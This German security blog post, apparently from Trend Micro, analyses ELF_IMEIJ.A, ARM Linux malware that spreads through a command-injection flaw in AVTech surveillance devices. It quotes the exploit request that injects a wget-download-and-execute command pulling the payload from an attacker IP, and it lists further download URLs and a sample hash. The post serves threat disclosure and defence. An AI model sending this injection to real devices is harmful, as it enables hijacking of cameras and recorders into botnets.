Linux-Schadsoftware nutzt CGI-Lücke aus

Originalbeitrag von Jeanne Jocson und Jennifer Gumban

Linux-basierte Geräte werden immer häufiger in smarten Systemen aller Branchen eingesetzt. IoT-Gateways erleichtern den Betrieb vernetzter Lösungen und Dienstleistungen, die für verschiedene Unternehmen von zentraler Bedeutung sind. Damit geraten diese Linux-basierten Geräte natürlich auch in den Fokus von Angreifern. Bereits 2016 gab es eine Reihe von Linux-Bedrohungen, deren umfassendste von der Mirai-Schadsoftware (ELF_MIRAI-Familie) ausging. Jetzt gibt es eine neue Linux-Bedrohung – die ARM-Schadsoftware ELF_IMEIJ.A (ELF_IMEIJ.A).

Die Malware nutzt eine Sicherheitslücke in Geräten von AVTech aus, einem Anbieter von Überwachungstechnik. Die Lücke entdeckten die Sicherheitsforscher von Search-Lab und unterrichteten AVTEch im Oktober 2016 davon. Doch es gab keine Reaktion darauf.

Infektionsablauf

Die Schadsoftware wird über RFIs in cgi-bin-Skripts verbreitet. Ein Angreifer sendet Remote die Anfrage an beliebige IP-Adressen und versucht die Sicherheitslücke auszunützen:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

Sie nutzt CloudSetup.cgi, die AVTech CGI Directory-Lücke, um einen Befehl einzufügen, der das Herunterladen der Schadsoftware anstößt. Danach ändert der Hacker die Berechtigungen der Datei, um sie lokal auszuführen.

Bild 1. Die Infektionskette von ELF_IMEIJ.A

Die Eintrittspunkte für die neue Malware sind AVTech-Geräte wie IP-Kameras, CCTV-Ausrüstung und Netzwerkrecorder, die die AVTech-Cloud unterstützen. Sobald sich die Schadsoftware auf dem Gerät installiert hat, sammelt sie Informationen und Daten zur Netzwerkaktivität. Sie kann auch Shell-Befehle des Angreifers ausführen, DDoS-Angriffe starten und sich selbst beenden. Infizierte Geräte können auch weitere damit verbundene in Gefahr bringen.

Es gibt drei IP-Adressen bei zwei unterschiedlichen ISPs, unter denen ELF_IMEIJ.A heruntergeladen wird:

  • hxxp://172.247.116.3:8080/Arm1
  • hxxp://172.247.116.21:85/Arm1
  • hxxp://192.154.108.2:8080/Arm1

Die von Trend Micro beobachteten IP-Adressen sind bei einem südkoreanischen ISP registriert.

Es wird berichtet, dass AVTech mehr als 130.000 verschiedene Geräte im Internet hat, sodass dieser Angriff dazu genutzt werden kann, um einen permanenten Zugang zu diesen Geräten aufrecht zu erhalten. Auch können die Geräte in Bots verwandelt und für breit angelegte DDoS-Angriffe eingesetzt werden. Wie in den meisten Fällen sind diese Ziele nicht standardmäßig abgesichert und lassen sich auch nicht direkt überwachen.

ELF_IMEIJ.As DDoS-Fähigkeiten erinnern an Mirai, weisen aber auch Unterschiede auf:

MIRAI IMEIJ
Betroffene Geräte  verschiedene AVTech
Verwendete Ports 7547
5555
48101
39999
Exploits Geräte mit BusyBox Software installiert über Bruteforce Unsichere cgi-bin Skripts, um die Malware ELF_IMEIJ.A zu installieren

ELF_IMEIJ.A gehört zu einer Gruppe kürzlich entdeckter Schadsoftware, die die ARM-Plattform auf Linux-Geräten ausnutzt. ARM wird sehr häufig für IoT- und mobile Geräte eingesetzt und wird damit zur Hürde für die Angreifer solcher Geräte. Weiter entsprechende Schadsoftware umfasst das Umbreon Rootkit (ELF_UMBREON) und das LuaBot (ELF_LUABOT).

Trend Micro Security 10 und Trend Micro Internet Security bieten effizienten Schutz vor dieser Bedrohung, denn sie umfassen Funktionalität, die die Malware auf Endpunkten erkennen kann. Für den Schutz von vernetzten Geräten kann Trend Micro Home Network Security den Internet-Verkehr zwischen Router und den damit verbundenen Geräten prüfen. Unternehmen können auch Trend Micro Deep Discovery Inspector einsetzen, eine Netzwerk-Appliance, die alle Ports und mehr als 105 verschiedene Netzwerkprotokolle überwacht und damit fortschrittliche Bedrohungen und gezielte Angriffe aufspürt.

Die IMEIJ-Sample haben folgenden SHA256 Hash:

8040422762138d28aa411d8bb2307a93432416f72b292bf884fb7c7efde9f3f5

Zusätzliche Analyse von Ruby Santos

 

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

*